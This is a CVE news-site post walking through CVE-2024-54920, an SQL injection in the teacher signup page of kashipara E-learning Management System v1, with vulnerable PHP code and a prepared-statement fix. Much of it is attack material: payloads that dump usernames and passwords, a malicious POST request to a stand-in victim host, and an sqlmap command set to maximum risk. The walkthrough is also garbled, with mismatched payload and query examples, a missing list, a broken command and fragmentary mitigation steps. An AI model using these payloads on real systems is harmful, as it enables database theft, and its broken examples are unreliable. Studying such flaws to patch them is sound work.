CVE CyberSecurity Database News

CVE-2024-54920 - SQL Injection in kashipara E-learning Management System v1. (teacher_signup.php) – Exploit Details & Walkthrough

Poster -

A recently discovered vulnerability, CVE-2024-54920, has made headlines in the security community. This SQL Injection flaw was found in the /teacher_signup.php file of the popular kashipara E-learning Management System version 1.. In this post, we’ll break down what this means, show you code examples, how attackers can exploit it, and point you to useful references.

What is the Vulnerability?

The flaw sits in the way /teacher_signup.php handles user-supplied input for the parameters firstname, lastname, and class_id. Instead of treating these values as plain text (which is what you always want!), the system glues them directly into SQL queries. As a result, an attacker could sneak in malicious SQL code, letting them do things like:

Let’s look at a simplified version of what might be happening under the hood

<?php
// teacher_signup.php (vulnerable pseudocode)

$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$class_id = $_POST['class_id'];

// Dangerous way to build SQL query:
$sql = "INSERT INTO teachers (firstname, lastname, class_id) VALUES ('$firstname', '$lastname', '$class_id')";
$result = mysqli_query($conn, $sql);
?>

If no input validation or parameter binding is done, anything a user submits gets shoved into the raw SQL query!

How Attackers Exploit CVE-2024-54920

Let’s say an attacker wants to read more out of the database, or even grab a whole users table. Here’s a step-by-step of how they might do it:

Say the attacker submits the following for the firstname field

', (SELECT GROUP_CONCAT(username, ':', password) FROM users), '

When the form is submitted, the SQL builds into

INSERT INTO teachers (firstname, lastname, class_id) 
VALUES ('', (SELECT GROUP_CONCAT(username, ':', password) FROM users), '', 'someclass')

This is invalid for INSERT, but with some trial and error and knowledge of the DB structure, attacker can adapt their query for maximum impact.

Now the query runs as

INSERT INTO teachers (firstname, lastname, class_id) VALUES ('test' OR 1=1 -- ', 'lname', '1')

The comment (-- ) causes anything after to be ignored. Depending on the configuration, this could let you bypass logic or inject further statements.

Example POST Request with Malicious SQL

POST /teacher_signup.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

firstname=test', password=(SELECT GROUP_CONCAT(username, x3a, password) FROM users)#&lastname=a&class_id=1

Let’s use a tool like sqlmap (open-source and easy for attackers to leverage)

sqlmap -u "http://victim.com/teacher_signup.php"; --data="firstname=test&lastname=test&class_id=1" --risk=3 --level=5 --dbs

This command instructs sqlmap to automatically find and exploit SQL Injections, dumping database names, and, if possible, tables and data.

Why Does This Happen?

Root cause:
User inputs are inserted directly into database queries without sanitization or use of prepared statements.

Proper way

$stmt = $conn->prepare('INSERT INTO teachers (firstname, lastname, class_id) VALUES (?, ?, ?)');
$stmt->bind_param('ssi', $firstname, $lastname, $class_id);
$stmt->execute();

Unauthorized data access: Database tables may leak private info (usernames, passwords, emails)

- Potential for further hacking: If the attacker is motivated, they could escalate to full server control

Sanitize user input: Use validation (e.g., regex to allow only legitimate names)

3. Update software: If you’re using an affected version, check with the upstream repository for any patches.

References

- NVD CVE Entry (CVE-2024-54920)
- Kashipara E-learning Management System v1. – Project Page
- PHP: SQL Injection Prevention
- OWASP: SQL Injection

Final Words

If you’re running kashipara E-learning Management System v1., take action now! Patch your system and never trust user input. SQL Injection is one of the oldest and most dangerous vulnerabilities, but it’s also easy to fix with good development habits.

Stay safe, keep your code clean, and always sanitize those inputs!

Timeline

Published on: 12/09/2024 15:15:21 UTC
Last modified on: 12/10/2024 15:41:01 UTC